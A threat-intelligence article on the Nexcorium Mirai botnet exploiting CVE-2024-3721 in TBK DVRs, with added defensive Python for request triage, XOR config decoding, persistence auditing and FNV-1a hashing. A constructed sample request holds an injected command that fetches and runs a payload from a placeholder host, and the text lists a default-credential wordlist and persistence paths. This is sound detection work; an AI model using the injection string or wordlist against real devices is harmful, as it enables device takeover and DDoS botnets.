TBK DVR-4104 and DVR-4216 devices are under active exploitation by a Mirai-based botnet called Nexcorium, which targets an OS command injection vulnerability tracked as CVE-2024-3721. FortiGuard Labs has published a detailed technical analysis linking the campaign to a threat actor it identifies as “Nexus Team.”
CVE-2024-3721 is an OS command injection vulnerability in the TBK DVR-4104 and DVR-4216 digital video recorders, surveillance hardware widely deployed across commercial and enterprise environments.
The flaw, originally disclosed by researcher “netsecfish” in April 2024 alongside a publicly available proof-of-concept (PoC), allows attackers to inject arbitrary OS commands by manipulating the mdb and mdc arguments in crafted HTTP requests.
TBK DVR devices have historically attracted threat actor interest; as far back as 2023, FortiGuard Labs recorded over 50,000 unique IPS detections in a single month targeting the platform through a separate authentication bypass bug, CVE-2018-9995.
The persistence of exploitation campaigns against TBK hardware reflects a broader reality across the IoT threat landscape: these devices are widely deployed, rarely patched, and frequently configured with weak or default credentials, an ideal trifecta for botnet operators seeking scalable infection vectors.
Nexus Team Threat Actor
FortiGuard Labs identified a distinctive artifact embedded within the exploit traffic: a custom HTTP header X-Hacked-By: Nexus Team – Exploited By Erratic that serves as a digital signature for the attacker group.
Based on this indicator, researchers are attributing the campaign to a threat actor they designate as “Nexus Team,” though this group currently lacks broad public documentation in threat intelligence repositories.
The use of custom exploit headers for attribution or ego-branding is a tactic increasingly observed in lower-tier but technically capable threat actors operating in the IoT botnet ecosystem.
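The two network-visible signals described above, the mdb/mdc parameters carrying shell metacharacters and the X-Hacked-By vanity header, can be checked on captured HTTP requests. The following is an added example written for this page, not code from the FortiGuard analysis; the request path, host and download IP in the constructed samples are placeholders (RFC 5737 documentation addresses), and only the parameter names and header text come from the writeup.

```python
"""Triage raw HTTP requests for the two signals described in the writeup:
the Nexus Team vanity header and command-injection payloads in the
mdb / mdc parameters of CVE-2024-3721 exploit attempts."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the PoC abuses (from the writeup) and the shell metacharacters an
# injected command needs in order to break out of the intended argument.
SUSPECT_PARAMS = ("mdb", "mdc")
SHELL_META = re.compile(r"[;&|`$\n]")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request (as captured by a proxy or IDS) into its parts."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": url.path,
        # parse_qs percent-decodes, so an encoded %3B is matched as ';'
        "params": parse_qs(url.query, keep_blank_values=True),
        "headers": headers,
    }


def classify(raw: str) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    req = parse_request(raw)
    findings = []
    hacked_by = req["headers"].get("x-hacked-by")
    if hacked_by and "nexus team" in hacked_by.lower():
        findings.append(f"nexus-team-header:{hacked_by}")
    for name in SUSPECT_PARAMS:
        for value in req["params"].get(name, []):
            if SHELL_META.search(value):
                findings.append(f"cmd-injection:{name}={value!r}")
    return findings


# Constructed samples. Path, host and download IP are placeholders, not
# observed campaign values.
EXPLOIT_ATTEMPT = (
    "GET /cgi/example?mdb=sos&mdc=%3Bwget+http%3A%2F%2F198.51.100.7%2Fdvr%3Bsh+dvr HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "X-Hacked-By: Nexus Team - Exploited By Erratic\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /cgi/example?mdb=sos&mdc=status HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for sample in (EXPLOIT_ATTEMPT, BENIGN_REQUEST):
        print(classify(sample) or ["clean"])
```

The header check is the cheap, high-confidence signal, but it only catches this one group; the parameter check is what generalizes to any CVE-2024-3721 attempt. Because parse_qs percent-decodes once, a double-encoded payload (%253B) would slip past the metacharacter regex, so on a device that decodes twice you would want to decode until the value stops changing.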
Infection Chain and Downloader Mechanics
The initial exploitation of CVE-2024-3721 delivers a downloader shell script named dvr to the compromised device. This script fetches architecture-specific malware binaries whose filenames begin with nexuscorp, covering multiple Linux architectures: ARM, MIPS R3000, and x86-64 (AMD64).
Upon retrieval, the script sets the file permissions to 777 (world-readable, -writable and -executable) and immediately executes the payload, passing an argument that identifies the exploited device on the victim host.
This multi-architecture targeting approach is consistent with campaigns designed for maximum reach across the heterogeneous IoT device landscape, where CPU architectures vary significantly across manufacturers and device generations.
Nexcorium Malware Analysis
Upon execution, Nexcorium announces itself with the string “nexuscorp has taken control”, a behavioral trait consistent with the threat actor branding observed in other IoT malware families. The malware shares core architectural traits with the Mirai botnet family, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module.
Configuration Decoding: Nexcorium uses XOR decryption (keys 0x13 and 0xFD) to extract embedded configuration data, which includes the C2 server domain and port, persistence commands, a hard-coded brute-force credential wordlist, DDoS attack commands, and embedded exploit code.
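Mirai-style configuration tables are recoverable with a single-byte XOR, which is why an analyst can pull the C2 domain and credential list straight out of a sample. The following is an added example for this page, not code from the FortiGuard analysis or the malware: it assumes the two keys 0x13 and 0xFD protect two separately encoded tables of NUL-terminated entries (the writeup gives the keys but not the table layout), builds constructed tables from values quoted in the writeup, and shows both decoding with a known key and recovering an unknown key from a known plaintext marker.

```python
"""Recover plaintext strings from Mirai-style XOR-encoded configuration tables.

Nexcorium's tables are reported as XOR-encoded with the single-byte keys 0x13
and 0xFD. The table layout is assumed here: NUL-terminated entries, one key per
table. Everything below is an illustration built on that assumption."""
import string
from typing import List, Optional

PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key for b in data)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return printable runs of at least min_len bytes (the NUL-terminated entries)."""
    out, run = [], bytearray()
    for b in data + b"\x00":          # trailing sentinel flushes the last run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


def decode_table(blob: bytes, key: int) -> List[str]:
    return extract_strings(xor_bytes(blob, key))


def find_key(blob: bytes, marker: str) -> Optional[int]:
    """Brute-force the one-byte key under which `marker` appears in the plaintext.

    Ranking keys by printable ratio alone is unreliable (XOR with 0x01 keeps
    lowercase text printable), so a known fragment such as '/etc/' or 'admin'
    is the practical anchor."""
    needle = marker.encode("ascii")
    for key in range(256):
        if needle in xor_bytes(blob, key):
            return key
    return None


def build_table(entries: List[bytes], key: int) -> bytes:
    """Constructed test data only: encode entries the way decode_table expects."""
    return xor_bytes(b"".join(e + b"\x00" for e in entries), key)


# Constructed tables populated with values quoted in the writeup.
C2_TABLE = build_table(
    [b"r3brqw3d.b0ats.top", b"/usr/local/bin/sysd", b"/etc/systemd/system/persist.service"],
    0x13,
)
CRED_TABLE = build_table([b"admin", b"hikvision", b"12345", b"motorola", b"888888"], 0xFD)

if __name__ == "__main__":
    key = find_key(C2_TABLE, "/etc/")     # an analyst guesses a path is in there
    print(hex(key), decode_table(C2_TABLE, key))
    print(decode_table(CRED_TABLE, 0xFD))
```

Against a real sample the blob would be the raw bytes of the table section carved from the ELF; the same find_key call with a marker like "/proc/" or "admin" recovers the key without reversing the decryption routine, and the decoded strings go straight into the IOC list.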
Three Core Modules:
- Watchdog — Uses the process marker NXS_WD_CHILD to distinguish spawned child processes and ensure continuous operation
- Scanner — Initiates Telnet connections and launches credential brute-force attacks using a hard-coded wordlist of default and commonly reused passwords (e.g., admin, hikvision, 12345, motorola, 888888)
- Attacker — Parses C2 commands and launches targeted DDoS attacks
Notably, Nexcorium also bundles an exploit for CVE-2017-17215, which targets legacy Huawei HG532 routers. That vulnerability has appeared in numerous Mirai variants, demonstrating how older CVEs remain operationally relevant in botnets designed for breadth over precision.
Persistence Mechanisms
One of Nexcorium’s defining characteristics is its robust persistence architecture. After copying itself to /usr/local/bin/sysd, the malware employs four simultaneous persistence methods to survive reboots and remediation attempts:
- Init configuration — Modifies /etc/inittab to automatically restart the process if it terminates
- Startup script — Creates or updates /etc/rc.local to execute the malware at system startup
- Systemd service — Drops a unit file at /etc/systemd/system/persist.service, enabling automatic startup via systemd
- Cron job — Registers a scheduled crontab task to execute the malware after every reboot
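Because all four hooks point back at the same binary path or unit name, a host audit can check them together. The following is an added example for this page, not a FortiGuard or vendor tool: it reads the files the writeup names plus the usual crontab locations (the crontab paths and the exact line contents in the constructed fixtures are assumptions; the writeup names the files and the binary path but does not quote the entries).

```python
"""Audit a Linux host for the four persistence hooks described in the writeup,
all of which reference the copied binary /usr/local/bin/sysd or the dropped
persist.service unit. File reads go through a callable so the same logic runs
against a live filesystem or against constructed fixtures."""
import re
from typing import Callable, List, Optional, Tuple

MALWARE_PATH = "/usr/local/bin/sysd"
SERVICE_FILE = "/etc/systemd/system/persist.service"

# Files named in the writeup, plus common crontab locations (assumed; the
# writeup says only that a crontab entry is registered).
INIT_FILES = ["/etc/inittab", "/etc/rc.local", SERVICE_FILE]
CRON_FILES = ["/etc/crontab", "/var/spool/cron/crontabs/root", "/var/spool/cron/root"]

INDICATORS = re.compile(r"/usr/local/bin/sysd|\bsysd\b|persist\.service|nexuscorp", re.IGNORECASE)

Reader = Callable[[str], Optional[str]]  # path -> contents, or None if absent


def audit(read: Reader) -> List[Tuple[str, str]]:
    """Return (file, offending line) pairs; an empty list means no hook was found."""
    hits = []
    for path in INIT_FILES + CRON_FILES:
        text = read(path)
        if text is None:
            continue
        for line in text.splitlines():
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            if INDICATORS.search(stripped):
                hits.append((path, stripped))
    # A unit named persist.service should not exist at all on a clean device,
    # so its mere presence is reported even if its contents were not matched.
    if read(SERVICE_FILE) is not None and all(p != SERVICE_FILE for p, _ in hits):
        hits.append((SERVICE_FILE, "<unit file present>"))
    return hits


def filesystem_reader(path: str) -> Optional[str]:
    """Reader for a live host (or a mounted forensic image with paths rewritten)."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None


# Constructed fixtures. Exact line contents are hypothetical.
INFECTED = {
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/usr/local/bin/sysd\n",
    "/etc/rc.local": "#!/bin/sh\n/usr/local/bin/sysd &\nexit 0\n",
    SERVICE_FILE: "[Service]\nExecStart=/usr/local/bin/sysd\nRestart=always\n"
                  "[Install]\nWantedBy=multi-user.target\n",
    "/etc/crontab": "# m h dom mon dow user command\n@reboot root /usr/local/bin/sysd\n",
}
CLEAN = {
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/sbin/getty 115200 ttyS0\n",
    "/etc/rc.local": "#!/bin/sh\nexit 0\n",
}

if __name__ == "__main__":
    for name, fixture in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, audit(fixture.get))
    # On the real host: audit(filesystem_reader)
```

Remediation has to remove all four hooks in one pass and then kill the running process; clearing only rc.local leaves the inittab respawn entry to bring the binary back, which is exactly what the layered persistence is designed for. Run the audit again after a reboot to confirm nothing re-registered.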
After completing persistence setup, Nexcorium performs self-integrity verification using the FNV-1a hashing algorithm, and deletes its original binary from the initial execution path to hinder forensic analysis and evade detection.
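FNV-1a is a fast non-cryptographic hash: each byte is XORed into the state, which is then multiplied by the FNV prime. The following is an added example for this page, not code from the FortiGuard analysis or the malware, using the published FNV constants; whether Nexcorium hashes the on-disk file or the in-memory image is not stated in the writeup, so the check below over a constructed byte string is illustrative.

```python
"""FNV-1a, the hash Nexcorium is reported to use for self-integrity checking.

Because the expected digest must be embedded in the same binary, anyone who can
patch the code can also update the digest: the check is an anti-tamper speed
bump against crude modification, not a signature. The 32- and 64-bit parameters
are the published FNV constants."""

FNV32_OFFSET, FNV32_PRIME = 0x811C9DC5, 0x01000193
FNV64_OFFSET, FNV64_PRIME = 0xCBF29CE484222325, 0x00000100000001B3


def fnv1a_32(data: bytes) -> int:
    h = FNV32_OFFSET
    for b in data:
        h ^= b                              # "1a": XOR first, then multiply
        h = (h * FNV32_PRIME) & 0xFFFFFFFF
    return h


def fnv1a_64(data: bytes) -> int:
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & 0xFFFFFFFFFFFFFFFF
    return h


def integrity_ok(image: bytes, expected: int) -> bool:
    """What a startup self-check does: hash the image, compare to the baked-in constant."""
    return fnv1a_32(image) == expected


def tamper(image: bytes, offset: int) -> bytes:
    """Flip one bit at `offset`, simulating a patched instruction."""
    patched = bytearray(image)
    patched[offset] ^= 0x01
    return bytes(patched)


# Constructed stand-in for a binary image (not a real sample).
IMAGE = bytes(range(256)) * 4
EMBEDDED_DIGEST = fnv1a_32(IMAGE)   # what the builder would bake into the binary

if __name__ == "__main__":
    print(hex(EMBEDDED_DIGEST), integrity_ok(IMAGE, EMBEDDED_DIGEST))
    print(integrity_ok(tamper(IMAGE, 100), EMBEDDED_DIGEST))
```

A single-bit change is always detected: the XOR at the changed byte produces a different state, and every later step (multiply by an odd prime modulo 2^32, then XOR with the same byte) is a bijection, so the two states never reconverge. For a defender the same property is useful in reverse, since the embedded constant is a stable fingerprint of the exact build that can be matched in a memory or disk scan.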
DDoS Attack Capabilities
Nexcorium connects to its C2 server at r3brqw3d[.]b0ats[.]top and supports ten distinct DDoS attack methods, making it a versatile weapon for coordinated disruption campaigns:
| Command | Attack Type |
|---|---|
| udp | UDP Flood |
| syn | TCP SYN Flood |
| ack | TCP ACK Flood |
| std | TCP Generic Flood |
| stmp | SMTP Flood |
| psh | TCP PSH Flood |
| urg | TCP URG Flag Flood |
| udb | UDP Blast Flood |
| vse | VSE Query Flood |
| tcpa | TCP ACK + PSH Flood |
The malware can also receive killattk and botkill commands to halt attacks or terminate itself, indicating remote operator control over the botnet’s operational tempo.
Indicators of Compromise (IOCs)
Organizations should immediately scan for and block the following indicators across firewall, IDS, and SIEM platforms:
- IP Address: 84[.]200[.]87[.]36
- IP Address: 176[.]65[.]148[.]186
- C2 Domain: r3brqw3d[.]b0ats[.]top
Mitigation and Fortinet Protections
FortiGuard Labs confirms that the following Fortinet product detections are active for this campaign: BASH/Mirai.AEH!tr.dldr, ELF/Nexcorium.A!tr, ELF.Mirai.ATL!tr, and ELF/Mirai.EGX!tr.
The FortiGuard AntiVirus engine, integrated into FortiGate, FortiMail, FortiClient, and FortiEDR, blocks all described malware components using up-to-date signatures.
The FortiGuard Web Filtering Service blocks the C2 server domain, and an IPS signature (55717 TBK.DVR.SOSTREAMAX.Command.Injection) is available against CVE-2024-3721 exploitation.
Regardless of the security vendor in use, organizations should apply these immediate steps:
- Remove unpatched TBK DVR-4104 and DVR-4216 devices from internet-facing segments, or decommission them
- Change all default credentials on DVR and IoT devices immediately
- Block identified IOCs at perimeter firewalls and DNS resolvers
- Monitor for Telnet-based lateral movement within internal networks
- Deploy network behavioral analytics to flag anomalous traffic indicative of DDoS bot activity
FAQ
Q1. What is CVE-2024-3721?
CVE-2024-3721 is an OS command injection vulnerability in TBK DVR-4104 and DVR-4216 devices that allows remote attackers to execute arbitrary commands by manipulating HTTP request parameters.
Q2. What is the Nexcorium malware?
Nexcorium is a multi-architecture Mirai botnet variant deployed by the “Nexus Team” threat actor to compromise IoT devices and conduct large-scale DDoS attacks via a centralized C2 server.
Q3. Which devices are affected by this campaign?
TBK DVR-4104 and DVR-4216 digital video recorders are the primary targets, though Nexcorium’s bundled CVE-2017-17215 exploit also puts legacy Huawei HG532 routers at risk.
Q4. How can organizations protect themselves from Nexcorium?
Organizations should immediately patch or isolate affected TBK DVR devices, change default credentials, block the listed IOCs, and deploy FortiGuard AntiVirus or equivalent solutions with current threat signatures.
Site: thecybrdef.com